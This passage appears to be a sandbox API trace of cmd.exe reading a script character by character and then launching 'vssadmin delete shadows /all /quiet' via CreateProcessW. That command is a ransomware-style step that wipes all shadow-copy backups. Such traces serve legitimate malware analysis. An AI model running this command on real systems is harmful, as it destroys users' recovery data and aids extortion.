lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.182] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe340, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1 [0246.182] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.182] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.182] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.182] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe342, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1 [0246.182] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.182] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.182] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.182] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe344, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1 [0246.182] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.182] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.182] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.182] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe346, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1 [0246.182] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.182] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.182] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.182] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe348, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1 [0246.182] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.182] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.182] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.182] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe34a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1 [0246.182] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.182] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.182] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.182] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe34c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1 [0246.182] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.182] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.182] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.182] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0246.182] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.182] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.182] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.182] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe350, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0246.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.183] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe352, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0246.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.183] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe354, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0246.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.183] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe356, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0246.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.183] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0246.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.183] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0246.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.183] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0246.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.183] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0246.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.183] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe360, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0246.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.183] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe362, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0246.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.183] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe364, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0246.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.184] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.184] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.184] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0246.184] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.184] GetFileType (hFile=0xe8) returned 0x3 [0246.184] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.184] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.184] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.184] GetFileType (hFile=0xf4) returned 0x3 [0246.184] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.184] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x4abbc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0246.184] WriteFile (in: hFile=0xf4, lpBuffer=0x4abbc320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x25fa38, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesWritten=0x25fa38*=0x24, lpOverlapped=0x0) returned 1 [0246.184] GetProcessHeap () returned 0x370000 [0246.184] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x4012) returned 0x391010 [0246.184] GetProcessHeap () returned 0x370000 [0246.184] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x391010 | out: hHeap=0x370000) returned 1 [0246.184] GetProcessHeap () returned 0x370000 [0246.184] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb0) returned 0x389840 [0246.184] GetProcessHeap () returned 0x370000 [0246.184] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x22) returned 0x384630 [0246.185] GetProcessHeap () returned 0x370000 [0246.185] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x48) returned 0x390090 [0246.185] GetConsoleOutputCP () returned 0x4e3 [0246.185] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4abbbfe0 | out: lpCPInfo=0x4abbbfe0) returned 1 [0246.185] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0246.185] GetConsoleTitleW (in: lpConsoleTitle=0x25f9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0246.186] GetProcessHeap () returned 0x370000 [0246.186] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x218) returned 0x38aae0 [0246.186] GetProcessHeap () returned 0x370000 [0246.186] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x5a) returned 0x389a50 [0246.186] GetProcessHeap () returned 0x370000 [0246.186] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x420) returned 0x38b9a0 [0246.186] SetErrorMode (uMode=0x0) returned 0x0 [0246.186] SetErrorMode (uMode=0x1) returned 0x0 [0246.186] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x38b9b0, lpFilePart=0x25f280 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x25f280*="system32") returned 0x13 [0246.186] SetErrorMode (uMode=0x0) returned 0x1 [0246.186] GetProcessHeap () returned 0x370000 [0246.186] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x38b9a0, Size=0x4a) returned 0x38b9a0 [0246.186] GetProcessHeap () returned 0x370000 [0246.186] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b9a0) returned 0x4a [0246.186] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4abaf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0246.186] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0246.186] GetProcessHeap () returned 0x370000 [0246.186] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x104) returned 0x385bb0 [0246.186] GetProcessHeap () returned 0x370000 [0246.186] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1f8) returned 0x38ba00 [0246.186] GetProcessHeap () returned 0x370000 [0246.186] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x38ba00, Size=0x106) returned 0x38ba00 [0246.186] GetProcessHeap () returned 0x370000 [0246.186] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38ba00) returned 0x106 [0246.186] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4abaf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0246.186] GetProcessHeap () returned 0x370000 [0246.186] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xe8) returned 0x389c60 [0246.186] GetProcessHeap () returned 0x370000 [0246.186] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x389c60, Size=0x7e) returned 0x389c60 [0246.186] GetProcessHeap () returned 0x370000 [0246.186] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x389c60) returned 0x7e [0246.186] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0246.187] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x25eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25eff0) returned 0x385cc0 [0246.187] FindClose (in: hFindFile=0x385cc0 | out: hFindFile=0x385cc0) returned 1 [0246.187] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x25eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25eff0) returned 0xffffffffffffffff [0246.187] GetLastError () returned 0x2 [0246.187] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x25eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25eff0) returned 0x391040 [0246.187] FindClose (in: hFindFile=0x391040 | out: hFindFile=0x391040) returned 1 [0246.187] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0246.187] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0246.187] GetConsoleTitleW (in: lpConsoleTitle=0x25f540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0246.187] GetProcessHeap () returned 0x370000 [0246.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x21c) returned 0x38bb20 [0246.187] GetConsoleTitleW (in: lpConsoleTitle=0x38bb30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0246.187] GetProcessHeap () returned 0x370000 [0246.187] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x38bb20, Size=0xa2) returned 0x38bb20 [0246.187] GetProcessHeap () returned 0x370000 [0246.187] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38bb20) returned 0xa2 [0246.187] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0246.188] GetProcessHeap () returned 0x370000 [0246.188] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38bb20 | out: hHeap=0x370000) returned 1 [0246.188] InitializeProcThreadAttributeList (in: lpAttributeList=0x25f2f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x25f2b8 | out: lpAttributeList=0x25f2f8, lpSize=0x25f2b8) returned 1 [0246.188] UpdateProcThreadAttribute (in: lpAttributeList=0x25f2f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x25f2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x25f2f8, lpPreviousValue=0x0) returned 1 [0246.188] GetStartupInfoW (in: lpStartupInfo=0x25f410 | out: lpStartupInfo=0x25f410*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0246.188] GetProcessHeap () returned 0x370000 [0246.188] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x20) returned 0x384660 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0246.188] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0246.189] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0246.189] GetProcessHeap () returned 0x370000 [0246.189] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384660 | out: hHeap=0x370000) returned 1 [0246.189] GetProcessHeap () returned 0x370000 [0246.189] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x12) returned 0x389ac0 [0246.189] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x25f330*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x25f2e0 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x25f2e0*(hProcess=0x50, hThread=0x54, dwProcessId=0x724, dwThreadId=0x728)) returned 1 [0246.195] CloseHandle (hObject=0x54) returned 1 [0246.195] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0246.195] GetProcessHeap () returned 0x370000 [0246.195] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38f4e0 | out: hHeap=0x370000) returned 1 